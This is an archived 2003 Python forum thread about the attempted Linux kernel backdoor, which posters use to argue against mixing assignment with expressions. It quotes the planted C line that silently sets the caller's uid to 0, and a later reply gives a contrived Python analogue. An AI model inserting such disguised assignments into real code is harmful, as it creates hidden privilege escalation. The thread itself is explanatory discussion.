473,386 Members | 1,820 Online
Bytes | Software Development & Data Engineering Community
Post Job

Home Posts Topics Members FAQ

home > topics > python > questions > linux security: mixing assignment with expression

Join Bytes to post your question to a community of 473,386 software developers and data experts.

Linux security: mixing assignment with expression

Hey folks,

I was just reading about the attempt to insert a backdoor into the Linux
kernel. You can read the details here:

http://kerneltrap.org/node/view/1584

This is the code that the attacker inserted:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;

Notice the "current->uid = 0" expression? I think it's pretty clear that the
intent was to confuse the reader, to make the above code appear like it's
doing a comparison, when actually it is assigning 0 to the user ID (0 being
the root user).

In this case, the ability to mix assignment with expression in C not only
affected readability but--as a result--security. I think this clearly lends
credibility to Guido's design decision to deliberately prevent this sort of
"mistake".

--
..:[ dave benjamin (ramenboy) -:- www.ramenfest.com -:- www.3dex.com ]:.
: d r i n k i n g l i f e o u t o f t h e c o n t a i n e r :
Jul 18 '05 #1
2 1458
On Wed, 12 Nov 2003 20:27:14 -0000, Dave Benjamin
<ra***@lackingtalent.com> wrote:

In this case, the ability to mix assignment with expression in C not only
affected readability but--as a result--security. I think this clearly lends
credibility to Guido's design decision to deliberately prevent this sort of
"mistake".


I still prefer the solutions from other languages that use real
boolean types and then either don't allow boolean evaluation of
numbers (Smalltalk) or don't allow assignment of numbers to booleans
(Ada)
Jul 18 '05 #2
In article <3f***************@news.cybermesa.com>, Jay O'Connor wrote:
On Wed, 12 Nov 2003 20:27:14 -0000, Dave Benjamin
<ra***@lackingtalent.com> wrote:
In this case, the ability to mix assignment with expression in C not only
affected readability but--as a result--security. I think this clearly lends
credibility to Guido's design decision to deliberately prevent this sort of
"mistake".


I still prefer the solutions from other languages that use real
boolean types and then either don't allow boolean evaluation of
numbers (Smalltalk) or don't allow assignment of numbers to booleans
(Ada)


This still wouldn't be sufficient to prevent the following (admittedly
contrived) example:

if foo in [BAR, BAZ] and (admin_priveleges = True):
return oof

As far as the boolean evaluation issue is concerned, it's a tradeoff between
convenience and clarity sometimes. It's nice to treat an empty list as a
false value:

if items_left:
item = items_left.pop()
diddle(item)

But maybe we're back to the ol' implicit/explicit argument.

Smalltalk is particularly unusual in how it handles booleans. In Python
syntax, it would have to be something like:

Boolean(len(items_left == 0)).ifTrue(lambda: diddle(items_left.pop()))

--
..:[ dave benjamin (ramenboy) -:- www.ramenfest.com -:- www.3dex.com ]:.
: d r i n k i n g l i f e o u t o f t h e c o n t a i n e r :
Jul 18 '05 #3
New Post

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics

23
assignment expression peeve
by: Paul Rubin | last post by:
OK, I want to scan a file for lines matching a certain regexp. I'd like to use an assignment expression, like for line in file: if (g := re.match(pat, line)): croggle(g.group(1)) Since...
Python
10
relative precedence of ?: and assignment
by: Andrew Koenig | last post by:
It has been pointed out to me that various C++ books disagree about the relative precedence of ?: and the assignment operators. In order to satisfy myself about the matter once and for all, I...
C / C++
6
unions: initialization and assignment
by: Neil Zanella | last post by:
Hello, I would like to know whether the following C fragment is legal in standard C and behaves as intended under conforming implementations... union foo { char c; double d; };
C / C++
21
tricky assignment statemenent
by: Ike Naar | last post by:
Consider the following code: #include <stdlib.h> struct s { /* ... */ struct s * next; };
C / C++
13
Volatiles in assignment expressions
by: Daniel W | last post by:
Hi! I tried to post this to comp.lang.c.moderated but it didn't seem to go through. I've got a question about volatiles in assignment expressions. I found the following code snippet in an...
C / C++
35
Augument assignment versus regular assignment
by: nagy | last post by:
I do the following. First create lists x,y,z. Then add an element to x using the augumented assignment operator. This causes all the other lists to be changed also. But if I use the assignment...
Python
20
RFC: Assignment as expression (pre-PEP)
by: TimeHorse | last post by:
I would like to gauge interest in the following proposal: Problem: Assignment statements cannot be used as expressions. Performing a list of mutually exclusive checks that require data...
Python
24
C-like assignment expression?
by: boblatest | last post by:
Hello, I have an if-elif chain in which I'd like to match a string against several regular expressions. Also I'd like to use the match groups within the respective elif... block. The C-like...
Python
2
jwwicks
Zen and the Art of Debugging C/C++ in Linux with GDB
by: jwwicks | last post by:
C/C++ Programs and Debugging in Linux This tutorial will give you a basic idea how to debug a program in Linux using GDB. As you are aware Visual Studio doesn’t run on Linux so you have to use...
C / C++
0
Easy Steps to Fix "Canon Printer Won't Connect to WiFi Network"
by: taylorcarr | last post by:
A Canon printer is a smart device known for being advanced, efficient, and reliable. It is designed for home, office, and hybrid workspace use and can also be used for a variety of purposes. However,...
General
0
How to turn on java script in a villaon keypad mobile phone
by: Charles Arthur | last post by:
How do i turn on java script on a villaon, callus and itel keypad mobile phone
Java
0
Merging data from multiple Excel files
by: ryjfgjl | last post by:
In our work, we often receive Excel tables with data in the same format. If we want to analyze these data, it can be difficult to analyze them because the data is spread across multiple Excel files...
Data Management
1
Looking to do Android software development, any suggestions? Is flutter better?
by: nemocccc | last post by:
hello, everyone, I want to develop a software for my android phone for daily needs, any suggestions?
General
1
Is that possible of reading the .csv file in column wise and the column have different lengths ?
by: Sonnysonu | last post by:
This is the data of csv file 1 2 3 1 2 3 1 2 3 1 2 3 2 3 2 3 3 the lengths should be different i have to store the data by column-wise with in the specific length. suppose the i have to...
C / C++
0
How to build RAID in BIOS?
by: Hystou | last post by:
There are some requirements for setting up RAID: 1. The motherboard and BIOS support RAID configuration. 2. The motherboard has 2 or more available SATA protocol SSD/HDD slots (including MSATA, M.2...
Computer Hardware
0
marktang
What is ONU?
by: marktang | last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However,...
General
0
Oralloy
Problem With Comparison Operator <=> in G++
by: Oralloy | last post by:
Hello folks, I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>". The problem is that using the GNU compilers,...
C / C++
0
jinu1996
Maximizing Business Potential: The Nexus of Website Design and Digital Marketing
by: jinu1996 | last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven...
Online Marketing

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.

BYTES.COM © 2024
About Bytes
Terms Of Use
Privacy Policy
Sitemap
Advertise on Bytes:
Post a Job
Sponsored Posts
Platinum & Gold Sponsors
Hire Now!